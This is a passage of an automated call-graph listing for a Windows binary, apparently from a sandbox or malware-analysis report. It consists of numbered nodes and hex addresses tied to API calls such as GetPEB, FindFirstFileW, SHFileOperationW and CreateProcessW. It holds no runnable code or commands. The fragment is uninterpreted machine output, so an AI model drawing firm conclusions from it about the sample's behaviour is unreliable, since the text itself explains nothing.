6102->6105 6103 7b9a66 CloseServiceHandle 6103->6110 6107 7b3e60 GetPEB 6105->6107 6106 7b9af5 6106->6033 6109 7b9b21 6107->6109 6108 7b3e60 GetPEB 6108->6110 6109->6098 6110->6096 6110->6097 6110->6099 6110->6101 6110->6103 6110->6106 6110->6108 6389 7b7c60 6110->6389 6117 7b9630 6111->6117 6112 7b981f 6112->6033 6113 7b9829 6413 7b3780 6113->6413 6114 7b34c0 GetPEB 6114->6117 6116 7b9839 6116->6033 6117->6112 6117->6113 6117->6114 6118 7b3e60 GetPEB 6117->6118 6119 7b3f00 GetPEB 6117->6119 6118->6117 6119->6117 6139 7b12e1 6120->6139 6122 7b181c 6542 7b4220 6122->6542 6125 7b17d1 6125->6033 6127 7b1823 6127->6033 6129 7b34c0 GetPEB 6129->6139 6130 7b1641 _snwprintf 6135 7b3460 GetPEB 6130->6135 6132 7b42c0 GetPEB RtlAllocateHeap 6132->6139 6134 7b3f00 GetPEB 6134->6139 6135->6139 6137 7b3e60 GetPEB 6137->6139 6139->6122 6139->6125 6139->6127 6139->6129 6139->6130 6139->6132 6139->6134 6139->6137 6140 7b4220 GetPEB 6139->6140 6141 7b3460 GetPEB 6139->6141 6440 7b1fc0 6139->6440 6448 7b1e70 6139->6448 6457 7b5c00 6139->6457 6476 7b1c70 6139->6476 6492 7b2230 6139->6492 6500 7b2be0 6139->6500 6515 7b4ea0 6139->6515 6520 7b1900 6139->6520 6140->6139 6141->6139 6143 7bb101 6142->6143 6146 7baff8 6142->6146 6143->6033 6144 7b3e60 GetPEB 6144->6146 6145 7b3f00 GetPEB 6145->6146 6146->6143 6146->6144 6146->6145 6148 7b8709 6147->6148 6149 7b871f 6147->6149 6150 7b3f00 GetPEB 6148->6150 6149->6033 6151 7b8713 6150->6151 6152 7b3e60 GetPEB 6151->6152 6152->6149 6584 7b5500 6153->6584 6155 7b613c 6157 7b35c0 GetPEB 6155->6157 6156 7b6134 6156->6033 6159 7b6147 6157->6159 6158 7b3f00 GetPEB 6164 7b6074 6158->6164 6160 7b6168 6159->6160 6162 7b3f00 GetPEB 6159->6162 6166 7b61a2 6160->6166 6167 7b3f00 GetPEB 6160->6167 6161 7b3e60 GetPEB 6161->6164 6163 7b615c 6162->6163 6165 7b3e60 GetPEB 6163->6165 6164->6155 6164->6156 6164->6158 6164->6161 6165->6160 6169 7b61ca 6166->6169 6171 7b3f00 GetPEB 6166->6171 6168 7b6196 6167->6168 6170 7b3e60 GetPEB 6168->6170 6169->6033 6170->6166 6172 7b61be 6171->6172 6173 7b3e60 GetPEB 6172->6173 6173->6169 6176 7bb440 6174->6176 6175 7bb4ba 6175->6033 6176->6175 6594 7bab50 6176->6594 6610 7ba170 6176->6610 6631 7ba7a0 6176->6631 6651 7ba5e0 6176->6651 6185 7b9f40 6181->6185 6182 7ba01b 6183 7b9f64 6182->6183 6187 7b3f00 GetPEB 6182->6187 6183->6033 6184 7b3f00 GetPEB 6184->6185 6185->6182 6185->6183 6185->6184 6186 7b3e60 GetPEB 6185->6186 6186->6185 6188 7ba02e 6187->6188 6189 7b3e60 GetPEB 6188->6189 6189->6183 6199 7b6202 6190->6199 6193 7b42c0 2 API calls 6193->6199 6194 7b624b 6194->6033 6195 7b3e60 GetPEB 6195->6199 6196 7b3f00 GetPEB 6196->6199 6197 7b6490 6197->6033 6198 7b3f00 GetPEB 6201 7b642d 6198->6201 6199->6193 6199->6194 6199->6195 6199->6196 6199->6201 6765 7b55b0 6199->6765 6774 7b4c80 6199->6774 6200 7b3e60 GetPEB 6200->6201 6201->6197 6201->6198 6201->6200 6204 7b94f0 6202->6204 6203 7b95c2 6203->6033 6204->6203 6206 7b4c80 GetPEB 6204->6206 6207 7b3f00 GetPEB 6204->6207 6208 7b3e60 GetPEB 6204->6208 6783 7b46c0 6204->6783 6206->6204 6207->6204 6208->6204 6210 7b334a 6209->6210 6211 7b336f 6210->6211 6212 7b3f00 GetPEB 6210->6212 6214 7b3397 6211->6214 6216 7b3f00 GetPEB 6211->6216 6213 7b3363 6212->6213 6215 7b3e60 GetPEB 6213->6215 6214->6033 6215->6211 6217 7b338b 6216->6217 6218 7b3e60 GetPEB 6217->6218 6218->6214 6220 7b184c 6219->6220 6223 7b1862 6219->6223 6221 7b3f00 GetPEB 6220->6221 6222 7b1856 6221->6222 6224 7b3e60 GetPEB 6222->6224 6225 7b3f00 GetPEB 6223->6225 6229 7b188b 6223->6229 6224->6223 6226 7b187f 6225->6226 6228 7b3e60 GetPEB 6226->6228 6227 7b18ee 6227->6033 6228->6229 6229->6227 6229->6229 6798 7b25e0 6229->6798 6231 7b18d8 6232 7b18dc 6231->6232 6233 7b4220 GetPEB 6231->6233 6232->6033 6233->6227 6235 7b346d 6234->6235 6238 7b3483 6234->6238 6236 7b3f00 GetPEB 6235->6236 6237 7b3477 6236->6237 6239 7b3e60 GetPEB 6237->6239 6240 7b34ab 6238->6240 6241 7b3f00 GetPEB 6238->6241 6239->6238 6240->6033 6242 7b349f 6241->6242 6243 7b3e60 GetPEB 6242->6243 6243->6240 6246 7b53e0 6244->6246 6245 7b54b4 6245->6033 6246->6245 6247 7b3f00 GetPEB 6246->6247 6248 7b3e60 GetPEB 6246->6248 6247->6246 6248->6246 6257 7b9290 6249->6257 6250 7b949c 6252 7b9410 6250->6252 6254 7b3f00 GetPEB 6250->6254 6252->6033 6253 7b3f00 GetPEB 6253->6257 6255 7b94af 6254->6255 6256 7b3e60 GetPEB 6255->6256 6256->6252 6257->6250 6257->6252 6257->6253 6258 7b3e60 GetPEB 6257->6258 6813 7b1000 6257->6813 6258->6257 6268 7b8bc4 6259->6268 6260 7b8d1d 6822 7b36b0 6260->6822 6261 7b3780 2 API calls 6261->6268 6263 7b8d10 6263->6033 6265 7b34c0 GetPEB 6265->6268 6266 7b3f00 GetPEB 6266->6268 6267 7b3e60 GetPEB 6267->6268 6268->6260 6268->6261 6268->6263 6268->6265 6268->6266 6268->6267 6270 7b72d9 6269->6270 6271 7b72ef 6269->6271 6272 7b3f00 GetPEB 6270->6272 6275 7b7318 6271->6275 6276 7b3f00 GetPEB 6271->6276 6273 7b72e3 6272->6273 6274 7b3e60 GetPEB 6273->6274 6274->6271 6275->6033 6277 7b730c 6276->6277 6278 7b3e60 GetPEB 6277->6278 6278->6275 6283 7b9070 6279->6283 6280 7b91de 6280->6033 6281 7b3f00 GetPEB 6281->6283 6282 7b91e4 6284 7b3f00 GetPEB 6282->6284 6287 7b921f 6282->6287 6283->6280 6283->6281 6283->6282 6285 7b3e60 GetPEB 6283->6285 6286 7b9213 6284->6286 6285->6283 6288 7b3e60 GetPEB 6286->6288 6289 7b9247 6287->6289 6290 7b3f00 GetPEB 6287->6290 6288->6287 6289->6033 6291 7b923b 6290->6291 6292 7b3e60 GetPEB 6291->6292 6292->6289 6294 7b479b 6293->6294 6295 7b4785 6293->6295 6296 7b47cb GetCurrentProcessId 6294->6296 6298 7b3f00 GetPEB 6294->6298 6297 7b3f00 GetPEB 6295->6297 6301 7b47d5 6296->6301 6299 7b478f 6297->6299 6300 7b47b7 6298->6300 6302 7b3e60 GetPEB 6299->6302 6303 7b3e60 GetPEB 6300->6303 6301->6033 6302->6294 6304 7b47c3 6303->6304 6304->6296 6308 7bb2ec 6305->6308 6306 7bb422 6306->5994 6307 7b3f00 GetPEB 6307->6308 6308->6306 6308->6307 6309 7b3e60 GetPEB 6308->6309 6309->6308 6314 7bb1e0 6310->6314 6311 7bb2b2 6311->6033 6311->6311 6312 7b3e60 GetPEB 6312->6314 6313 7b3f00 GetPEB 6313->6314 6314->6311 6314->6312 6314->6313 6319 7b7420 6315->6319 6316 7b7608 6316->6033 6317 7b3f00 GetPEB 6317->6319 6318 7b4fd0 GetPEB 6318->6319 6319->6316 6319->6317 6319->6318 6320 7b3e60 GetPEB 6319->6320 6320->6319 6324 7b8d50 6321->6324 6322 7b8e3f 6323 7b4b70 2 API calls 6322->6323 6326 7b8e4f 6323->6326 6324->6322 6325 7b8e29 6324->6325 6327 7b34c0 GetPEB 6324->6327 6328 7b3f00 GetPEB 6324->6328 6329 7b3e60 GetPEB 6324->6329 6325->6014 6326->6014 6327->6324 6328->6324 6329->6324 6332 7b8753 6330->6332 6331 7b34c0 GetPEB 6331->6332 6332->6331 6334 7b88df 6332->6334 6335 7b8903 6332->6335 6336 7b8e80 2 API calls 6332->6336 6337 7b3f00 GetPEB 6332->6337 6344 7b3780 2 API calls 6332->6344 6346 7b3e60 GetPEB 6332->6346 6841 7b7700 6332->6841 6334->6006 6338 7b3f00 GetPEB 6335->6338 6342 7b8922 6335->6342 6336->6332 6337->6332 6339 7b8916 6338->6339 6340 7b3e60 GetPEB 6339->6340 6340->6342 6341 7b3f00 GetPEB 6343 7b8949 6341->6343 6342->6341 6345 7b8955 6342->6345 6347 7b3e60 GetPEB 6343->6347 6344->6332 6345->6006 6346->6332 6347->6345 6349 7b34e3 6348->6349 6350 7b3508 6349->6350 6351 7b3f00 GetPEB 6349->6351 6354 7b3530 6350->6354 6355 7b3f00 GetPEB 6350->6355 6352 7b34fc 6351->6352 6353 7b3e60 GetPEB 6352->6353 6353->6350 6354->6046 6354->6049 6356 7b3524 6355->6356 6357 7b3e60 GetPEB 6356->6357 6357->6354 6370 7b505c 6358->6370 6359 7b5367 6360 7b5386 6359->6360 6361 7b3f00 GetPEB 6359->6361 6362 7b53ae 6360->6362 6368 7b3f00 GetPEB 6360->6368 6363 7b537a 6361->6363 6362->6081 6365 7b3e60 GetPEB 6363->6365 6364 7b3f00 GetPEB 6364->6370 6365->6360 6366 7b534d RtlAllocateHeap 6366->6362 6366->6370 6369 7b53a2 6368->6369 6371 7b3e60 GetPEB 6369->6371 6370->6359 6370->6362 6370->6364 6370->6366 6372 7b3e60 GetPEB 6370->6372 6373 7b42c0 6370->6373 6371->6362 6372->6370 6374 7b42cd 6373->6374 6379 7b42e3 6373->6379 6375 7b3f00 GetPEB 6374->6375 6376 7b42d7 6375->6376 6377 7b3e60 GetPEB 6376->6377 6377->6379 6378 7b4310 RtlAllocateHeap 6378->6370 6379->6378 6380 7b3f00 GetPEB 6379->6380 6381 7b42ff 6380->6381 6382 7b3e60 GetPEB 6381->6382 6383 7b430b 6382->6383 6383->6378 6385 7b3050 6384->6385 6387 7b307a 6385->6387 6399 7b38f0 6385->6399 6387->6106 6388 7b3092 6388->6106 6390 7b7c80 6389->6390 6391 7b7d97 6390->6391 6392 7b7ddd 6390->6392 6393 7b3f00 GetPEB 6390->6393 6394 7b3e60 GetPEB 6390->6394 6391->6110 6395 7b3f00 GetPEB 6392->6395 6398 7b7dfd 6392->6398 6393->6390 6394->6390 6396 7b7df1 6395->6396 6397 7b3e60 GetPEB 6396->6397 6397->6398 6398->6110 6409 7b3910 6399->6409 6400 7b3a3b FindFirstFileW 6403 7b3b8f 6400->6403 6400->6409 6401 7b3ac1 6401->6388 6402 7b3b70 6402->6403 6404 7b3f00 GetPEB 6402->6404 6403->6388 6405 7b3b83 6404->6405 6407 7b3e60 GetPEB 6405->6407 6406 7b3e60 GetPEB 6406->6409 6407->6403 6408 7b34c0 GetPEB 6408->6409 6409->6400 6409->6401 6409->6402 6409->6406 6409->6408 6410 7b3f00 GetPEB 6409->6410 6411 7b38f0 GetPEB 6409->6411 6412 7b3460 GetPEB 6409->6412 6410->6409 6411->6409 6412->6409 6414 7b37ab 6413->6414 6415 7b3795 6413->6415 6419 7b37dd 6414->6419 6420 7b3f00 GetPEB 6414->6420 6416 7b3f00 GetPEB 6415->6416 6417 7b379f 6416->6417 6418 7b3e60 GetPEB 6417->6418 6418->6414 6422 7b3812 6419->6422 6424 7b3f00 GetPEB 6419->6424 6421 7b37d1 6420->6421 6423 7b3e60 GetPEB 6421->6423 6427 7b3f00 GetPEB 6422->6427 6432 7b384a 6422->6432 6423->6419 6425 7b3806 6424->6425 6426 7b3e60 GetPEB 6425->6426 6426->6422 6428 7b383e 6427->6428 6430 7b3e60 GetPEB 6428->6430 6429 7b3876 6435 7b38d1 SHFileOperationW 6429->6435 6436 7b3f00 GetPEB 6429->6436 6430->6432 6431 7b3f00 GetPEB 6433 7b386a 6431->6433 6432->6429 6432->6431 6434 7b3e60 GetPEB 6433->6434 6434->6429 6435->6116 6437 7b38c0 6436->6437 6438 7b3e60 GetPEB 6437->6438 6439 7b38cc 6438->6439 6439->6435 6447 7b1fd2 6440->6447 6441 7b2208 6441->6139 6442 7b2212 6442->6441 6444 7b4220 GetPEB 6442->6444 6443 7b42c0 2 API calls 6443->6447 6444->6441 6445 7b3f00 GetPEB 6445->6447 6446 7b3e60 GetPEB 6446->6447 6447->6441 6447->6442 6447->6443 6447->6445 6447->6446 6455 7b1e86 6448->6455 6449 7b1f77 6450 7b1f68 6449->6450 6451 7b3f00 GetPEB 6449->6451 6450->6139 6453 7b1f98 6451->6453 6452 7b3f00 GetPEB 6452->6455 6454 7b3e60 GetPEB 6453->6454 6454->6450 6455->6449 6455->6450 6455->6452 6456 7b3e60 GetPEB 6455->6456 6456->6455 6458 7b5c26 6457->6458 6459 7b5c10 6457->6459 6463 7b3f00 GetPEB 6458->6463 6467 7b5c4e 6458->6467 6460 7b3f00 GetPEB 6459->6460 6461 7b5c1a 6460->6461 6462 7b3e60 GetPEB 6461->6462 6462->6458 6464 7b5c42 6463->6464 6465 7b3e60 GetPEB 6464->6465 6465->6467 6466 7b5cd2 6466->6139 6467->6466 6468 7b5c99 6467->6468 6469 7b3f00 GetPEB 6467->6469 6472 7b3f00 GetPEB 6468->6472 6474 7b5cc1 6468->6474 6470 7b5c8d 6469->6470 6471 7b3e60 GetPEB 6470->6471 6471->6468 6473 7b5cb5 6472->6473 6475 7b3e60 GetPEB 6473->6475 6474->6139 6475->6474 6477 7b1d06 6476->6477 6478 7b1cf0 6476->6478 6482 7b1dad 6477->6482 6483 7b3f00 GetPEB 6477->6483 6479 7b3f00 GetPEB 6478->6479 6480 7b1cfa 6479->6480 6481 7b3e60 GetPEB 6480->6481 6481->6477 6486 7b1de1 6482->6486 6487 7b3f00 GetPEB 6482->6487 6484 7b1da1 6483->6484 6485 7b3e60 GetPEB 6484->6485 6485->6482 6490 7b4ea0 GetPEB 6486->6490 6488 7b1dd5 6487->6488 6489 7b3e60 GetPEB 6488->6489 6489->6486 6491 7b1e15 6490->6491 6491->6139 6494 7b2255 6492->6494 6493 7b229c 6493->6139 6494->6493 6495 7b25be 6494->6495 6496 7b3f00 GetPEB 6494->6496 6499 7b3e60 GetPEB 6494->6499 6497 7b25cd 6495->6497 6498 7b4220 GetPEB 6495->6498 6496->6494 6497->6139 6498->6497 6499->6494 6514 7b2c1a 6500->6514 6501 7b2fcf 6504 7b2fee 6501->6504 6505 7b3f00 GetPEB 6501->6505 6503 7b2cae 6503->6139 6504->6139 6506 7b2fe2 6505->6506 6509 7b3e60 GetPEB 6506->6509 6507 7b3f00 GetPEB 6507->6514 6508 7b34c0 GetPEB 6508->6514 6509->6504 6510 7b3e60 GetPEB 6510->6514 6511 7b4220 GetPEB 6511->6514 6512 7b3460 GetPEB 6512->6514 6514->6501 6514->6503 6514->6507 6514->6508 6514->6510 6514->6511 6514->6512 6552 7b56f0 6514->6552 6561 7b2980 6514->6561 6518 7b4eb6 6515->6518 6516 7b4f3d 6516->6139 6517 7b3f00 GetPEB 6517->6518 6518->6516 6518->6517 6519 7b3e60 GetPEB 6518->6519 6519->6518 6526 7b191f 6520->6526 6521 7b1bc6 6522 7b35c0 GetPEB 6521->6522 6523 7b1bd0 6522->6523 6525 7b3f00 GetPEB 6523->6525 6529 7b1bf1 6523->6529 6524 7b1ba4 6524->6139 6527 7b1be5 6525->6527 6526->6521 6526->6524 6536 7b4e30 GetPEB 6526->6536 6540 7b3f00 GetPEB 6526->6540 6541 7b3e60 GetPEB 6526->6541 6574 7b35c0 6526->6574 6528 7b3e60 GetPEB 6527->6528 6528->6529 6530 7b3f00 GetPEB 6529->6530 6531 7b1c23 6529->6531 6532 7b1c17 6530->6532 6533 7b1c4b 6531->6533 6535 7b3f00 GetPEB 6531->6535 6534 7b3e60 GetPEB 6532->6534 6533->6139 6534->6531 6537 7b1c3f 6535->6537 6536->6526 6538 7b3e60 GetPEB 6537->6538 6538->6533 6540->6526 6541->6526 6543 7b4243 6542->6543 6544 7b422d 6542->6544 6548 7b3f00 GetPEB 6543->6548 6549 7b426b 6543->6549 6545 7b3f00 GetPEB 6544->6545 6546 7b4237 6545->6546 6547 7b3e60 GetPEB 6546->6547 6547->6543 6550 7b425f 6548->6550 6549->6127 6551 7b3e60 GetPEB 6550->6551 6551->6549 6558 7b5701 6552->6558 6553 7b57e3 6554 7b5723 6553->6554 6555 7b3f00 GetPEB 6553->6555 6554->6514 6557 7b57f6 6555->6557 6556 7b3f00 GetPEB 6556->6558 6559 7b3e60 GetPEB 6557->6559 6558->6553 6558->6554 6558->6556 6560 7b3e60 GetPEB 6558->6560 6559->6554 6560->6558 6562 7b29a0 6561->6562 6565 7b2abf 6562->6565 6568 7b3f00 GetPEB 6562->6568 6570 7b3e60 GetPEB 6562->6570 6563 7b2b0c 6563->6514 6564 7b2ae4 6564->6563 6571 7b3f00 GetPEB 6564->6571 6565->6563 6565->6564 6566 7b3f00 GetPEB 6565->6566 6567 7b2ad8 6566->6567 6569 7b3e60 GetPEB 6567->6569 6568->6562 6569->6564 6570->6562 6572 7b2b00 6571->6572 6573 7b3e60 GetPEB 6572->6573 6573->6563 6575 7b35e4 6574->6575 6576 7b3609 6575->6576 6577 7b3f00 GetPEB 6575->6577 6580 7b3f00 GetPEB 6576->6580 6583 7b3631 6576->6583 6578 7b35fd 6577->6578 6579 7b3e60 GetPEB 6578->6579 6579->6576 6581 7b3625 6580->6581 6582 7b3e60 GetPEB 6581->6582 6582->6583 6583->6526 6585 7b5516 6584->6585 6590 7b552c 6584->6590 6586 7b3f00 GetPEB 6585->6586 6587 7b5520 6586->6587 6588 7b3e60 GetPEB 6587->6588 6588->6590 6589 7b5586 6589->6164 6590->6589 6591 7b3f00 GetPEB 6590->6591 6592 7b557a 6591->6592 6593 7b3e60 GetPEB 6592->6593 6593->6589 6606 7bab66 6594->6606 6596 7bab8c 6596->6176 6598 7bac52 6599 7bac71 6598->6599 6600 7b3f00 GetPEB 6598->6600 6604 7bac99 6599->6604 6605 7b3f00 GetPEB 6599->6605 6601 7bac65 6600->6601 6602 7b3e60 GetPEB 6601->6602 6602->6599 6603 7b3f00 GetPEB 6603->6606 6604->6176 6608 7bac8d 6605->6608 6606->6596 6606->6598 6606->6603 6607 7b3e60 GetPEB 6606->6607 6667 7b4b70 6606->6667 6689 7bacd0 6606->6689 6607->6606 6609 7b3e60 GetPEB 6608->6609 6609->6604 6630 7ba189 6610->6630 6611 7bacd0 GetPEB 6611->6630 6612 7ba552 6614 7ba571 6612->6614 6617 7b3f00 GetPEB 6612->6617 6613 7ba439 6613->6176 6624 7ba599 6614->6624 6626 7b3f00 GetPEB 6614->6626 6616 7b34c0 GetPEB 6616->6630 6620 7ba565 6617->6620 6618 7b4220 GetPEB 6618->6630 6619 7b3f00 GetPEB 6619->6630 6622 7b3e60 GetPEB 6620->6622 6621 7b4b70 2 API calls 6621->6630 6622->6614 6624->6176 6625 7b3e60 GetPEB 6625->6630 6627 7ba58d 6626->6627 6629 7b3e60 GetPEB 6627->6629 6628 7b3460 GetPEB 6628->6630 6629->6624 6630->6611 6630->6612 6630->6613 6630->6616 6630->6618 6630->6619 6630->6621 6630->6625 6630->6628 6699 7bb520 6630->6699 6706 7b1150 6630->6706 6636 7ba7c5 6631->6636 6632 7baa19 6632->6176 6633 7bacd0 GetPEB 6633->6636 6634 7baa7c GetCurrentProcessId 6634->6636 6635 7baacd 6639 7b3f00 GetPEB 6635->6639 6643 7baaec 6635->6643 6636->6632 6636->6633 6636->6634 6636->6635 6637 7b4b70 2 API calls 6636->6637 6641 7b42c0 2 API calls 6636->6641 6649 7b3f00 GetPEB 6636->6649 6650 7b3e60 GetPEB 6636->6650 6721 7b49a0 6636->6721 6731 7b4850 6636->6731 6637->6636 6642 7baae0 6639->6642 6641->6636 6644 7b3e60 GetPEB 6642->6644 6645 7bab14 6643->6645 6646 7b3f00 GetPEB 6643->6646 6644->6643 6645->6176 6647 7bab08 6646->6647 6648 7b3e60 GetPEB 6647->6648 6648->6645 6649->6636 6650->6636 6660 7ba5ef 6651->6660 6652 7ba710 6652->6176 6653 7b3f00 GetPEB 6653->6660 6654 7ba731 6656 7ba750 6654->6656 6658 7b3f00 GetPEB 6654->6658 6663 7ba778 6656->6663 6664 7b3f00 GetPEB 6656->6664 6657 7b42c0 2 API calls 6657->6660 6659 7ba744 6658->6659 6661 7b3e60 GetPEB 6659->6661 6660->6652 6660->6653 6660->6654 6660->6657 6662 7b3e60 GetPEB 6660->6662 6740 7b4370 6660->6740 6661->6656 6662->6660 6663->6176 6665 7ba76c 6664->6665 6666 7b3e60 GetPEB 6665->6666 6666->6663 6668 7b4b82 6667->6668 6671 7b4b98 6667->6671 6669 7b3f00 GetPEB 6668->6669 6670 7b4b8c 6669->6670 6673 7b3e60 GetPEB 6670->6673 6672 7b4bd7 CreateProcessW 6671->6672 6674 7b3f00 GetPEB 6671->6674 6675 7b4c73 6672->6675 6676 7b4bf7 6672->6676 6673->6671 6677 7b4bc6 6674->6677 6675->6606 6678 7b4bff 6676->6678 6680 7b4c33 6676->6680 6682 7b3f00 GetPEB 6676->6682 6679 7b3e60 GetPEB 6677->6679 6678->6606 6681 7b4bd2 6679->6681 6684 7b4c5d 6680->6684 6686 7b3f00 GetPEB 6680->6686 6681->6672 6683 7b4c27 6682->6683 6685 7b3e60 GetPEB 6683->6685 6684->6606 6685->6680 6687 7b4c51 6686->6687 6688 7b3e60 GetPEB 6687->6688 6688->6684 6698 7baced 6689->6698 6690 7baf9f 6693 7baf37 6690->6693 6694 7b3f00 GetPEB 6690->6694 6691 7b3f00 GetPEB 6691->6698 6692 7b34c0 GetPEB 6692->6698 6693->6606 6695 7bafb2 6694->6695 6697 7b3e60 GetPEB 6695->6697 6696 7b3e60 GetPEB 6696->6698 6697->6693 6698->6690 6698->6691 6698->6692 6698->6693 6698->6696 6703 7bb536 6699->6703 6700 7bb55f 6700->6630 6701 7bb633 6715 7b4fd0 6701->6715 6703->6700 6703->6701 6704 7b3f00 GetPEB 6703->6704 6705 7b3e60 GetPEB 6703->6705 6704->6703 6705->6703 6708 7b1160 6706->6708 6707 7b124c 6709 7b1244 6707->6709 6711 7b3f00 GetPEB 6707->6711 6708->6707 6708->6709 6710 7b3f00 GetPEB 6708->6710 6714 7b3e60 GetPEB 6708->6714 6709->6630 6710->6708 6712 7b125f 6711->6712 6713 7b3e60 GetPEB 6712->6713 6713->6709 6714->6708 6716 7b4ff9 6715->6716 6717 7b500f 6715->6717 6718 7b3f00 GetPEB 6716->6718 6717->6700 6719 7b5003 6718->6719 6720 7b3e60 GetPEB 6719->6720 6720->6717 6725 7b49c0 6721->6725 6722 7b4b37 6723 7b49ea 6722->6723 6724 7b3f00 GetPEB 6722->6724 6723->6636 6726 7b4b4a 6724->6726 6725->6722 6725->6723 6727 7b34c0 GetPEB 6725->6727 6729 7b3f00 GetPEB 6725->6729 6730 7b3e60 GetPEB 6725->6730 6728 7b3e60 GetPEB 6726->6728 6727->6725 6728->6723 6729->6725 6730->6725 6732 7b4870 6731->6732 6733 7b496e 6732->6733 6734 7b492c 6732->6734 6736 7b3f00 GetPEB 6732->6736 6739 7b3e60 GetPEB 6732->6739 6733->6734 6735 7b3f00 GetPEB 6733->6735 6734->6636 6737 7b4981 6735->6737 6736->6732 6738 7b3e60 GetPEB 6737->6738 6738->6734 6739->6732 6741 7b450e 6740->6741 6742 7b4384 6740->6742 6741->6660 6742->6741 6743 7b3f00 GetPEB 6742->6743 6746 7b43d6 6742->6746 6744 7b43ca 6743->6744 6745 7b3e60 GetPEB 6744->6745 6745->6746 6747 7b3f00 GetPEB 6746->6747 6755 7b44f4 6746->6755 6756 7b4436 6746->6756 6748 7b442a 6747->6748 6749 7b3e60 GetPEB 6748->6749 6749->6756 6750 7b44ba 6760 7b4550 6750->6760 6751 7b3f00 GetPEB 6751->6756 6754 7b3e60 GetPEB 6754->6756 6755->6660 6756->6750 6756->6751 6756->6754 6757 7b3f00 GetPEB 6758 7b44e8 6757->6758 6759 7b3e60 GetPEB 6758->6759 6759->6755 6761 7b44d0 6760->6761 6763 7b456b 6760->6763 6761->6755 6761->6757 6762 7b3f00 GetPEB 6762->6763 6763->6761 6763->6762 6764 7b3e60 GetPEB 6763->6764 6764->6763 6771 7b55c6 6765->6771 6766 7b56a8 6767 7b55e8 6766->6767 6769 7b3f00 GetPEB 6766->6769 6767->6199 6768 7b3f00 GetPEB 6768->6771 6770 7b56bb 6769->6770 6772 7b3e60 GetPEB 6770->6772 6771->6766 6771->6767 6771->6768 6773 7b3e60 GetPEB 6771->6773 6772->6767 6773->6771 6781 7b4ca0 6774->6781 6775 7b4db4 6777 7b4d7c 6775->6777 6778 7b3f00 GetPEB 6775->6778 6776 7b3f00 GetPEB 6776->6781 6777->6199 6779 7b4dc7 6778->6779 6782 7b3e60 GetPEB 6779->6782 6780 7b3e60 GetPEB 6780->6781 6781->6775 6781->6776 6781->6777 6781->6780 6782->6777 6784 7b46d7 6783->6784 6789 7b46ed 6783->6789 6785 7b3f00 GetPEB 6784->6785 6786 7b46e1 6785->6786 6787 7b3e60 GetPEB 6786->6787 6787->6789 6788 7b4760 6788->6204 6789->6788 6790 7b4721 6789->6790 6791 7b3f00 GetPEB 6789->6791 6793 7b4752 6790->6793 6795 7b3f00 GetPEB 6790->6795 6792 7b4715 6791->6792 6794 7b3e60 GetPEB 6792->6794 6793->6204 6794->6790 6796 7b4746 6795->6796 6797 7b3e60 GetPEB 6796->6797 6797->6793 6810 7b25f0 6798->6810 6799 7b2771 6799->6231 6800 7b2912 6801 7b3f00 GetPEB 6800->6801 6804 7b2937 6800->6804 6803 7b292b 6801->6803 6802 7b42c0 2 API calls 6802->6810 6805 7b3e60 GetPEB 6803->6805 6808 7b295f 6804->6808 6809 7b3f00 GetPEB 6804->6809 6805->6804 6806 7b3f00 GetPEB 6806->6810 6807 7b3e60 GetPEB 6807->6810 6808->6231 6811 7b2953 6809->6811 6810->6799 6810->6800 6810->6802 6810->6806 6810->6807 6812 7b3e60 GetPEB 6811->6812 6812->6808 6820 7b1010 6813->6820 6814 7b103a 6814->6257 6815 7b1105 6815->6814 6817 7b3f00 GetPEB 6815->6817 6816 7b3f00 GetPEB 6816->6820 6818 7b1118 6817->6818 6819 7b3e60 GetPEB 6818->6819 6819->6814 6820->6814 6820->6815 6820->6816 6821 7b3e60 GetPEB 6820->6821 6821->6820 6823 7b34c0 GetPEB 6822->6823 6824 7b36c4 6823->6824 6825 7b36e5 6824->6825 6826 7b3f00 GetPEB 6824->6826 6829 7b3f00 GetPEB 6825->6829 6831 7b371a 6825->6831 6827 7b36d9 6826->6827 6828 7b3e60 GetPEB 6827->6828 6828->6825 6830 7b370e 6829->6830 6832 7b3e60 GetPEB 6830->6832 6833 7b3742 6831->6833 6834 7b3f00 GetPEB 6831->6834 6832->6831 6836 7b376e 6833->6836 6838 7b3f00 GetPEB 6833->6838 6835 7b3736 6834->6835 6837 7b3e60 GetPEB 6835->6837 6836->6033 6837->6833 6839 7b3762 6838->6839 6840 7b3e60 GetPEB 6839->6840 6840->6836 6851 7b7712 6841->6851 6842 7b77b3 6844 7b77d2 6842->6844 6846 7b3f00 GetPEB 6842->6846 6843 7b34c0 GetPEB 6843->6851 6844->6332 6845 7b78a3 6845->6332 6847 7b77c6 6846->6847 6849 7b3e60 GetPEB 6847->6849 6848 7b3e60 GetPEB 6848->6851 6849->6844 6850 7b3f00 GetPEB 6850->6851 6851->6842 6851->6843 6851->6845 6851->6848 6851->6850 6852 7b30a0 6855 7b30ba 6852->6855 6853 7b32ab 6854 7b3f00 GetPEB 6853->6854 6857 7b3238 6853->6857 6856 7b32bf 6854->6856 6855->6853 6855->6857 6858 7b3291 RtlAllocateHeap 6855->6858 6860 7b3f00 GetPEB 6855->6860 6861 7b3e60 GetPEB 6855->6861 6859 7b3e60 GetPEB 6856->6859 6858->6855 6858->6857 6859->6857 6860->6855 6861->6855 6915 7b9b60 6923 7b9b80 6915->6923 6916 7b9d96 6917 7b9d12 6916->6917 6919 7b3f00 GetPEB 6916->6919 6918 7b9dd0 GetPEB 6918->6923 6920 7b9da9 6919->6920 6922 7b3e60 GetPEB 6920->6922 6921 7b3f00 GetPEB 6921->6923 6922->6917 6923->6916 6923->6917 6923->6918 6923->6921 6924 7b3e60 GetPEB 6923->6924 6924->6923 6931 7b47e0 6932 7b4c80 GetPEB 6931->6932 6933 7b47f5 6932->6933 6934 7b1fd8 6940 7b1fd2 6934->6940 6935 7b2208 6936 7b2212 6936->6935 6938 7b4220 GetPEB 6936->6938 6937 7b42c0 2 API calls 6937->6940 6938->6935 6939 7b3f00 GetPEB 6939->6940 6940->6935 6940->6936 6940->6937 6940->6939 6941 7b3e60 GetPEB 6940->6941 6941->6940 7040 7ba198 7059 7ba189 7040->7059 7041 7bacd0 GetPEB 7041->7059 7042 7ba552 7044 7ba571 7042->7044 7048 7b3f00 GetPEB 7042->7048 7043 7ba439 7054 7ba599 7044->7054 7055 7b3f00 GetPEB 7044->7055 7045 7b1150 GetPEB 7045->7059 7046 7b3f00 GetPEB 7046->7059 7047 7b34c0 GetPEB 7047->7059 7050 7ba565 7048->7050 7049 7b4220 GetPEB 7049->7059 7052 7b3e60 GetPEB 7050->7052 7051 7b4b70 2 API calls 7051->7059 7052->7044 7053 7bb520 GetPEB 7053->7059 7056 7ba58d 7055->7056 7058 7b3e60 GetPEB 7056->7058 